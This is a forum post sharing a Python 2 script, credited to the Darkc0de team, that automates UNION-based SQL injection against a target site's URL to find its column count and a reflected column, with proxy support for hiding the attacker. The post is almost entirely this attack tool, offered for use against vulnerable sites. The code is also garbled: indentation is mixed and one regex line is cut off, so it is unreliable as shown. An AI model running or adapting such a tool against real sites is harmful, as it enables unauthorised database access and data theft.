Jump to content
Gonzalez

[Python] SQLi Column Finder

By Gonzalez, in Programare

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted 
#!/usr/bin/python
#SQLi column finder
#This script finds the number of columns in a SQLi and a null column!
#thats the short and sweet of it.
#the site must be vuln to SQLi for this to work
#If your sure its vuln to SQLi and its not finding the columns there are 2 possibilities.
#1. only vuln to blind SQLi
#2. it has over 100 columns increase to 200.. (never seen one with more than 200 columns)

# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx
# and the rest of the Darkc0de members

import sys, re, socket, httplib, urllib2

#Maximum Number of Columns this Script will check for!
#Change this if you think column length for target site is greater then 100
colMax = 100
#Add proxy support: Format  127.0.0.1:8080
proxy = "None"

print "\n   rsauron:darkc0de.com Column Lenth Finder v1.0"
print "---------------------------------------------------"

if len(sys.argv) != 2:
   print "\n\tUsage: ./colfinder.py <vulnSQLi>"
   print "\n\tEx: ./colfinder.py \"www.site.com/news.php?id=22\"\n"
   sys.exit(1)

siteorig = sys.argv[1]
if siteorig[:7] != "http://":
   siteorig = "http://"+siteorig

try:
   if proxy != "None":
      print "\n[+] Testing Proxy..."
      h2 = httplib.HTTPConnection(proxy)
      h2.connect()
      print "[+] Proxy:",proxy
      print "[+] Building Handler"
      proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
   else:
      print "\n[-] Proxy Not Given"
      proxy_handler = ""
except(socket.timeout):
   print "\n[-] Proxy Timed Out"
   sys.exit(1)
except(), msg:
   print msg
   print "\n[-] Proxy Failed"
   sys.exit(1)

print "[+] Attempting To find the number of columns..."
checkfor=[]
firstgo = "True"
site = siteorig+"+AND+1=2+UNION+SELECT+"
makepretty = ""
for a in xrange(0,colMax):
        a = str(a)
        darkc0de = "darkcode"+a
        checkfor.append(darkc0de)
   opener = urllib2.build_opener(proxy_handler)
   if firstgo == "True":
                site = site+"0x"+darkc0de.encode("hex")
                firstgo = "False"
        else:
                site = site+",0x"+darkc0de.encode("hex")
        finalurl = site+"--"
   source = opener.open(finalurl).read()
        for b in checkfor:
                colFound = re.findall(b,source)
                if len(colFound) >= 1:
                        print "[+] Column Length is:",len(checkfor)
                        b = re.findall(("[\d]"),
                        print "[+] Found null column at column #:",b[0]
                        firstgo = "True"
                        for c in xrange(0,len(checkfor)):
                                if firstgo == "True":
                                        makepretty = makepretty+str(c)
                                        firstgo = "False"
                                else:
                                        makepretty = makepretty+","+str(c)
                        print "[+] Site URL:",siteorig+"+AND+1=2+UNION+SELECT+"+makepretty+"--"
                        print "[-] Done!\n"
                        sys.exit(1)
print "[-] Sorry Column Length could not be found."
print "[-] Try increasing colMax variable. or site is not injectable"
print "[-] Done\n"

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...